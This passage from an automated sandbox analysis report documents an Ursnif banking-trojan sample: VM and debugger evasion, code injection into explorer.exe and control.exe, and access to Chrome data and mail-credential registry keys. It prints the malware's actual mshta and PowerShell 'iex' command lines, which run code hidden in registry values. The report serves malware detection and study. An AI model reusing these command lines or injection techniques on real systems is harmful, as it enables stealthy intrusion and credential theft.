Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10007896 rdtsc 0_2_10007896
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5186 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3748 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F632BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_02F632BA
Source: C:\Windows\explorer.exe Code function: 37_2_03B70180 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 37_2_03B70180
Source: C:\Windows\explorer.exe Code function: 37_2_03B60C34 FindFirstFileW, 37_2_03B60C34
Source: C:\Windows\explorer.exe Code function: 37_2_03B5A85C FindFirstFileW,DeleteFileW,FindNextFileW, 37_2_03B5A85C
Source: explorer.exe, 00000025.00000000.456781210.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000025.00000000.440682703.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.455716541.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
Source: explorer.exe, 00000025.00000000.461469931.000000000DC36000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
Source: explorer.exe, 00000025.00000000.438597559.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000025.00000000.456890873.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000025.00000000.449342670.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000025.00000000.455716541.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000025.00000000.455716541.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
Source: explorer.exe, 00000025.00000000.456890873.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000025.00000003.470452781.00000000101F0000.00000004.00000040.sdmp, 44E8.bin.37.dr Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW;`
Source: explorer.exe, 00000025.00000000.455716541.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10007896 rdtsc 0_2_10007896
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0122B5D0 mov eax, dword ptr fs:[00000030h] 0_2_0122B5D0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0122B6E0 mov eax, dword ptr fs:[00000030h] 0_2_0122B6E0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580 Jump to behavior
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 9B851580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: EAE000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: EB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 3C30000 value: 80 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: 40 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 5128 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3472 Jump to behavior
Source: C:\Windows\explorer.exe Thread register set: target process: 4016
Source: C:\Windows\explorer.exe Thread register set: target process: 4288
Source: C:\Windows\explorer.exe Thread register set: target process: 4448
Source: C:\Windows\explorer.exe Thread register set: target process: 5972
Source: C:\Windows\explorer.exe Thread register set: target process: 5876
Source: C:\Windows\System32\control.exe Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe Thread register set: target process: 6904
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C6912E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C6912E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: EAE000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 3C30000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9CA2.tmp' 'c:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESABD5.tmp' 'c:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000025.00000000.450806472.0000000005EA0000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000025.00000002.636715149.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F693D5 cpuid 0_2_02F693D5
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_015110FC GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_015110FC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F693D5 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_02F693D5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0151179C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_0151179C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
